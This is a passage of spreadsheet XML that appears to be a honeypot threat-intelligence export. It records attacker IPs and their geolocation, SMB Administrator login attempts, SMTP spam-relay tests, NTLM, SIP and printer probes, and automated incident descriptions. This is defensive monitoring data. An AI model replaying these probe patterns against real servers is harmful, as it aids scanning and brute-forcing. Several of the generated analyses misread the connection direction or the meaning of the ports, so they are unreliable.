    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52741)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53105)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55941)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56259)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60617)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53316)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53653)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52997)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,62715)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,63379)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60185)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60526)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56553)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56894)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60143)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60310)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60434)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,NULL)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60531)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60832)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,60935)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61080)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61199)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61518)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,61662)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53778)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54197)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54282)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54398)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54465)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54554)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54652)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54720)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54812)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54895)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,54979)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55050)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55137)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55243)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55316)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55411)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55577)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55671)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,55779)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56868)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,56948)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57019)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57114)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57215)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57304)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57388)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57798)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57871)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,57970)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58115)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58189)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58289)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58357)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58468)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58549)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58752)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58830)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53479)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53967)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50848)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,51896)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52751)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53426)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53356)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53886)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53334)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,53639)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52355)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,52802)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,58427)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50522)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50863)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50016)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,50341)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,62391)}&amp;&amp;{Data_SMB:Incoming connection (103.168.159.158,63180)}</t>
  </si>
  <si>
    <t>::ffff:67a8:9f9e</t>
  </si>
  <si>
    <t>An incoming connection from an external IP address is made to a SMB service.
This could be an attempt to access or exploit the SMB service on the monitored system.
It may indicate unauthorized access or malicious activity targeting the SMB service. &amp;&amp; Possible malicious activity is an incoming SMB connection from an unknown IP address attempting to access the system. This could be an attempt to exploit vulnerabilities in file sharing services or spread malware through the network. The source IP may be a remote attacker trying to gain unauthorized access. &amp;&amp; An incoming connection from an IP address (103.168.159.158) was made to the system for SMB sharing. This could be a suspicious attempt to gain unauthorized access or transfer files. The source IP may be trying to exploit vulnerabilities in the service. &amp;&amp; Incoming SMB connection from a suspicious IP address (103.168.159.158) to an open SMB share, potentially attempting unauthorized access or data exfiltration.
The remote IP is making an unexpected and possibly malicious connection to the SMB service.
This could be a sign of a potential exploitation attempt or reconnaissance activity. &amp;&amp; An incoming SMB connection was detected from an IP address. This may indicate an attempt to access or exploit the system's file sharing service, which could be a malicious activity. The source IP is attempting to initiate communication with the targeted service. &amp;&amp; Incoming SMB connection from unknown IP address attempting to establish unauthorized access.
This indicates a potential attempt by an attacker to exploit vulnerabilities or gain unauthorized access to resources on the network.
It may be a reconnaissance activity or a prelude to more malicious actions such as data exfiltration. &amp;&amp; A remote device is attempting to establish an SMB connection to a server at IP address 103.168.159.158, potentially indicating a malicious port scanning or reconnaissance activity.
The source IP is trying to initiate communication with the server.
This could be a precursor to further exploitation or data transfer. &amp;&amp; An incoming connection from an unknown IP address suggests potential unauthorized access to the service. The IP address 103.168.159.158 may be trying to establish a malicious connection. This could be an attempt to exploit vulnerabilities in the system or steal sensitive data. &amp;&amp; An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources.
This may indicate a scanning or reconnaissance attempt by a malicious entity.
Further investigation is needed to confirm the intent behind this activity. &amp;&amp; An incoming SMB connection from an unknown IP address indicates a potential scanning or exploitation attempt.
The IP address and port number suggest a possible brute-force attack or vulnerability scan.
This activity may be indicative of malicious reconnaissance or exploitation attempts. &amp;&amp; An unknown IP address is attempting to establish a connection to a sensitive service on our system. This could be an initial step in a larger malicious operation or a reconnaissance attempt by an attacker. The use of a high port number suggests the attack may not be a traditional vulnerability exploit. &amp;&amp; An incoming SMB connection from an IP address (103.168.159.158) with a port of 63180 has been detected.
This may indicate an attempt to exploit the system or access unauthorized files.
Port 63180 is not a standard SMB port, which could be a sign of malicious activity.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; SMB Scanning &amp;&amp; SMB Attack &amp;&amp; SMB Scanning &amp;&amp; SMB Scanning &amp;&amp; SMB Brute &amp;&amp; Port scan &amp;&amp; SMB Scanning &amp;&amp; Port Scanning &amp;&amp; SMB Portscan</t>
  </si>
  <si>
    <t>85c683c57825e176157cfbba8963bc30</t>
  </si>
  <si>
    <t>165.154.235.57</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_DHCP_H6&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_DHCP_H32&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMTP_H18&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SMTP_H20</t>
  </si>
  <si>
    <t>25&amp;&amp;53&amp;&amp;53748&amp;&amp;67&amp;&amp;10467&amp;&amp;67&amp;&amp;42568&amp;&amp;NA</t>
  </si>
  <si>
    <t>142002</t>
  </si>
  <si>
    <t>Scloud Pte Ltd</t>
  </si>
  <si>
    <t>SCLOUDPTELTD-SG</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 7 Feb 2025 00:25:42 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 9 Feb 2025 19:36:10 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 13 Feb 2025 12:41:53 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 19 Feb 2025 16:10:18 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '194.233.76.135_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 26 Feb 2025 13:43:21 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 27 Feb 2025 12:07:24 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 27 Feb 2025 18:21:32 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Feb 2025 16:56:07 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 8 Mar 2025 16:16:04 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 10 Mar 2025 17:30:51 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 12 Mar 2025 05:33:56 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 12 Mar 2025 19:17:14 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 19 Mar 2025 01:51:35 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 21 Mar 2025 17:09:21 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 30 Mar 2025 15:55:01 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 7 Apr 2025 14:49:03 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.8.69_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 10 Apr 2025 21:05:39 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 10 Apr 2025 21:14:30 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 13 Apr 2025 18:10:48 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:a59a:eb39</t>
  </si>
  <si>
    <t>Low&amp;&amp;Medium&amp;&amp;High</t>
  </si>
  <si>
    <t>The log suggests an attempt to reset the SMTP session, which could be a step in spamming or phishing campaigns.
This action is typically followed by sending multiple emails or attempting to establish unauthorized connections. 
It may indicate malicious intent to abuse email services. &amp;&amp; This log entry indicates that an attacker attempted to authenticate using the LOGIN command, likely attempting to steal credentials or gain unauthorized access to a mail account. The fact that it's using the AUTH command suggests a login attempt is being made. This could be a sign of a phishing or password cracking attack. &amp;&amp; Malicious activity detected - Attempt to establish unauthorized SMTP connection, possibly for spam or phishing purposes, which was then abruptly terminated upon reaching the server. The QUIT command indicates a sudden end to the session without proper completion of the communication process. This could be an indication of a reconnaissance probe or an initial step in a more sophisticated attack. &amp;&amp; No log data provided, unable to analyze or describe possible malicious activity. &amp;&amp; Malicious activity detected: suspicious SMTP command sent, attempting to reset state, potentially for spamming or phishing purposes. This could be a reconnaissance step by an attacker to prepare for further malicious activities. The RSET command is being used unusually in this context.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Password Hack &amp;&amp; Brute Force</t>
  </si>
  <si>
    <t>899b0d5113c41713287d9f4b5fe8da79</t>
  </si>
  <si>
    <t>59.95.97.85</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>23&amp;&amp;22&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b5f:6155</t>
  </si>
  <si>
    <t>d21a498dedf6d6f3c2e8b86d87294061</t>
  </si>
  <si>
    <t>42.200.197.209</t>
  </si>
  <si>
    <t>42-200-197-209.static.imsbiz.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>NNO</t>
  </si>
  <si>
    <t>North</t>
  </si>
  <si>
    <t>Kwu Tung</t>
  </si>
  <si>
    <t>1819570</t>
  </si>
  <si>
    <t>22.4947</t>
  </si>
  <si>
    <t>114.107</t>
  </si>
  <si>
    <t>4760</t>
  </si>
  <si>
    <t>PCCW IMS Limited</t>
  </si>
  <si>
    <t>PCCW IMSBiz</t>
  </si>
  <si>
    <t>Hong Kong Telecommunications (HKT) Limited</t>
  </si>
  <si>
    <t>::ffff:2ac8:c5d1</t>
  </si>
  <si>
    <t>The log shows an attempt to access a telnet service, which is often used for malicious activities such as unauthorized access or reconnaissance. The fact that the activity type for this specific connection is listed as "not available" suggests the attackers may be trying to remain stealthy. This behavior could indicate an initial probing phase by malicious actors.</t>
  </si>
  <si>
    <t>afefec432e1af19e464153caab983a0b</t>
  </si>
  <si>
    <t>154.212.141.221</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_HTTPS_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9100&amp;&amp;1433&amp;&amp;80&amp;&amp;23&amp;&amp;5432&amp;&amp;NA&amp;&amp;445&amp;&amp;110&amp;&amp;59680&amp;&amp;60004&amp;&amp;25&amp;&amp;443&amp;&amp;3389&amp;&amp;3306&amp;&amp;143&amp;&amp;21</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;query&amp;&amp;request&amp;&amp;login&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=10962'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=25036'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.221;rport=63890'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.221,49984)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.209.6:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.171.39:9100_x000D_
Accept: */*_x000D_
_x000D_
